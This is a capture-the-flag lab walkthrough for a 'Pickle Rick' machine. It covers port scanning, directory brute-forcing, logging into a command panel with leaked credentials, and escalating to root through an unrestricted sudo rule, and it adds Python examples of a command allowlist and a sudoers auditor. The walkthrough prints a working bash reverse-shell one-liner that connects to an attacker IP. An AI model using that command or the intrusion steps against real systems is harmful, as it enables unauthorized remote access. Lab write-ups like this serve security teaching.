# Pickle Rick

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak3lLkcfDZqHgMXwhi%2F-Mak3qHHNTT7AZXhvntn%2Fimage.png?alt=media\&token=bcfba9bc-5627-4a5d-993a-87d7ee816f4f)

## Reconnaissance

Let's start with an initial nmap scan to find open ports:

```
nmap -Pn 10.10.249.44
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak44v4vOYrsw3w8gBR%2F-Mak4TfZwLVNscIX6F8j%2Fimage.png?alt=media\&token=7378f2c7-2c0d-41de-8ee6-46f343c3fefb)

Detailed Nmap scan:

Command breakdown:

* (**-sV**): Service version detection
* (**-sC**): Default nmap scripts
* (**-p**): Specifying ports 22 and 80
* (**-oN nmap**): Saving the output to a file called `nmap`

```
nmap -sC -sV -p 22,80 -oN nmap 10.10.249.44
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak44v4vOYrsw3w8gBR%2F-Mak4omHkD1umv-62tZ7%2Fimage.png?alt=media\&token=0a602a3d-c3b2-41f9-bfa6-de8537943e19)

## Enumerate

### Port 80

Let's visit the website and look at the source code.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak44v4vOYrsw3w8gBR%2F-Mak59ZZL-Ikj9JmPuTb%2Fimage.png?alt=media\&token=477edaf4-8ae4-485e-8861-614714e8e893)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak44v4vOYrsw3w8gBR%2F-Mak5Q-ZXa6GTpXhM2x2%2Fimage.png?alt=media\&token=2fe7767d-f86b-4b01-8656-77489108bfe7)

Let's add this to our notes. I personally use `gedit` on the Kali virtual machine and then transfer everything to OneNote on my host machine and organize it there. To use gedit: `gedit <name of file>`

```
gedit notes
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak5nz9kY7GB1s-agcK%2F-Mak61bG06dGULZD1sXh%2Fimage.png?alt=media\&token=e6169c59-b59f-44b3-ae42-794dc9456bac)

Now let's visit `robots.txt`; we usually find something interesting there, such as hidden directories or sometimes even passwords.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak5nz9kY7GB1s-agcK%2F-Mak6KBdFkykmm5kODbe%2Fimage.png?alt=media\&token=c5a01811-ac7f-47b2-a32f-1c432b3a85ae)

This looks interesting. It could be a directory, but I tested that and it was not, so it might be a password; let's save it in our notes.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak6cgMxtHhBIG0rQ4m%2F-Mak6g35NBsY4oW2nle0%2Fimage.png?alt=media\&token=6f58dbf1-ac5b-4381-9dfe-44b7c2f055b0)

Now let's run `gobuster` to see if we can find hidden directories.

Command breakdown:

* (**-w**): Specifying the wordlist
* (**-u**): Specifying the URL
* (**-x**): Specifying the extensions to try

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.249.44 -x txt,php,html
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak6cgMxtHhBIG0rQ4m%2F-Mak7z4ut6o77qoj1e-F%2Fimage.png?alt=media\&token=0121ff36-a966-45e1-86af-1dc08de4c37d)

`/login.php` and `/portal.php` were the same page, as `/portal.php` redirects to `/login.php`.

`/assets` had some JavaScript and CSS files which did not look like they were going to help us exploit this machine.

Now we have found ourselves a login page.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak8DgtmMy5vMJe04R_%2F-Mak8c1nHLkBRdh-gUuC%2Fimage.png?alt=media\&token=822790b3-59dd-4db0-b177-e40c649f4785)

If we look at our notes, we have a username and a possible password; let's try using them to log in.

And we got in!

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak8DgtmMy5vMJe04R_%2F-Mak8pKJXygZciFGyKt4%2Fimage.png?alt=media\&token=8af687fc-ca7d-46ff-b325-a30047b2b695)

We have a command panel where we can run commands; let's explore it.

Running `ls` lists the files present in the current directory.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak8DgtmMy5vMJe04R_%2F-Mak92SwiNO5uhsd1XXP%2Fimage.png?alt=media\&token=2cd0250a-7763-4d0d-8ef2-98c65b56d628)

Let's try reading those files:

```
cat Sup3rS3cretPickl3Ingred.txt
```

And... the command is disabled. So what can we do here? Trying different commands shows that many are allowed but `cat` is not. After a lot of searching I found a command that gave us a reverse shell on the server:

```
bash -c 'exec bash -i &>/dev/tcp/10.13.8.64/1234 <&1'
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak9VqYXi1QxY8sJ-g1%2F-MakAW5XRYnEICvr7Cd9%2Fimage.png?alt=media\&token=8bd7309d-a271-4424-95f9-7542007621ac)
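The panel above blocks `cat` by name yet still hands other commands to a shell. The following is an added Python model of that design beside a hardened one (it is not the box's own PHP code; the command names, the `REJECTED` string and the permitted `ls` flags are assumptions):

```python
import shlex
import subprocess
from typing import Dict, List, Optional, Set

# Constructed model of the walkthrough's command panel (not the box's real
# PHP): a denylist that blocks a few programs by name and hands everything
# else to a shell.
DENYLIST: Set[str] = {"cat", "head", "tail", "more", "less"}

def denylist_allows(cmdline: str) -> bool:
    """Weak check: only the first word is compared against the denylist,
    so any program not on the list, including a shell, passes through."""
    parts = cmdline.split()
    return bool(parts) and parts[0] not in DENYLIST

# Hardened design: an allowlist of programs with the exact arguments each
# may take, executed without a shell so redirections, pipes and /dev/tcp
# are never interpreted.
ALLOWLIST: Dict[str, Set[str]] = {
    "ls": {"-l", "-a", "-la", "-al"},
    "whoami": set(),
    "pwd": set(),
}
REJECTED = "Command disabled"

def allowlist_argv(cmdline: str) -> Optional[List[str]]:
    """Return an argv vector if every token is permitted, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:                  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWLIST:
        return None
    if any(arg not in ALLOWLIST[argv[0]] for arg in argv[1:]):
        return None
    return argv

def run_panel_command(cmdline: str) -> str:
    """Execute only an allowlisted argv, never via a shell."""
    argv = allowlist_argv(cmdline)
    if argv is None:
        return REJECTED
    try:
        done = subprocess.run(argv, capture_output=True, text=True, timeout=5)
        return done.stdout
    except (OSError, subprocess.SubprocessError) as exc:
        return f"error: {exc}"
```

The denylist rejects `cat` but lets `bash -c ...` through; the allowlist rejects anything that is not an exact program plus approved flags, and `ls; id` or `ls $(id)` fail because they never reach a shell.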

And now we can read the contents of `Sup3rS3cretPickl3Ingred.txt`.

```
cat Sup3rS3cretPickl3Ingred.txt
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-Mak9VqYXi1QxY8sJ-g1%2F-MakAfFCwS8uks8a9-Kh%2Fimage.png?alt=media\&token=fe6d9472-1bb5-4744-a597-6479962fbd62)

This is the answer to the first question.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MakAltRigtNKoqN2Oct%2F-MakAotQjh0dgx8boXr2%2Fimage.png?alt=media\&token=3f58bd56-fbdb-4f9e-b7f7-81e9c1ae07f0)

Now let's enumerate the machine and find a way to get root.

## Privilege Escalation

While looking around I found the second ingredient, which is the second answer.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MakAltRigtNKoqN2Oct%2F-MakBMeygdKVJTasbFEk%2Fimage.png?alt=media\&token=22e4c57a-8729-4fbd-a836-2926c4ae3d72)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MakAltRigtNKoqN2Oct%2F-MakCEM1zhuoGtTV3FUG%2Fimage.png?alt=media\&token=42520f8b-0338-43e1-9382-6bba3ad5aa00)

Now let's try to become root so we can `cd` into the root directory, as I think the final ingredient is hidden there. Let's run `sudo -l` to see which commands we can run as other users.

```
sudo -l
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MakAltRigtNKoqN2Oct%2F-MakBgSEG-UgzC5x0vAD%2Fimage.png?alt=media\&token=e44ad418-7808-4427-8fa9-286cc62686cc)

We are allowed to run ALL, so let's switch to root using `su`:

```
sudo su
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MakAltRigtNKoqN2Oct%2F-MakBx2JcRQGxaVslufw%2Fimage.png?alt=media\&token=3bb80b4e-93d1-4868-8d1c-7baca2a1be0b)

And we are root! We can also see the third and final ingredient in the root directory.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MakAltRigtNKoqN2Oct%2F-MakC8pwOhs6g1l05IOj%2Fimage.png?alt=media\&token=3c6faf73-851a-49c9-8fcc-f5d37c80cb11)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MakAltRigtNKoqN2Oct%2F-MakCICyd9MeI-b1yeBi%2Fimage.png?alt=media\&token=451dda23-d0e1-4fd1-a00c-850dbed10edd)
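The `sudo -l` result above is what a sudoers audit should catch before an attacker does. Here is an added Python checker (not part of the original write-up) that parses sudoers user specifications and flags any non-root principal allowed to run `ALL` as root; the sample file is constructed and is not the box's real `/etc/sudoers`:

```python
import re
from dataclasses import dataclass
from typing import List

# One sudoers user specification:  who  host = (runas)  TAG:  cmd, cmd
SPEC = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
                  r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

@dataclass
class Rule:
    who: str
    runas: str
    tags: List[str]
    cmds: List[str]

def parse_sudoers(text: str) -> List[Rule]:
    """Parse user specs; comments, Defaults and @include lines are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "@")):
            continue
        m = SPEC.match(line)
        if not m:
            continue
        runas = m.group("runas") or "root"        # sudoers default runas
        tags = [t for t in re.split(r"[:\s]+", m.group("tags")) if t]
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        rules.append(Rule(m.group("who"), runas, tags, cmds))
    return rules

def audit_sudoers(text: str) -> List[str]:
    """Flag non-root principals allowed to run ALL as root (or as ALL)."""
    findings = []
    for r in parse_sudoers(text):
        as_root = r.runas.split(":")[0] in ("ALL", "root")
        if r.who != "root" and as_root and "ALL" in r.cmds:
            nopass = " without a password" if "NOPASSWD" in r.tags else ""
            findings.append(f"{r.who} may run ALL as {r.runas}{nopass}")
    return findings

# Constructed sample, not the box's real /etc/sudoers
SAMPLE = """\
Defaults env_reset
root      ALL=(ALL:ALL) ALL
%sudo     ALL=(ALL:ALL) ALL
www-data  ALL=(ALL) NOPASSWD: ALL
rick      ALL=(root) NOPASSWD: /usr/bin/less /var/log/syslog
"""
```

On the sample, `audit_sudoers(SAMPLE)` reports the `%sudo` group and the `www-data` web user (the latter without a password), while the narrowly scoped `rick` rule is not flagged.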
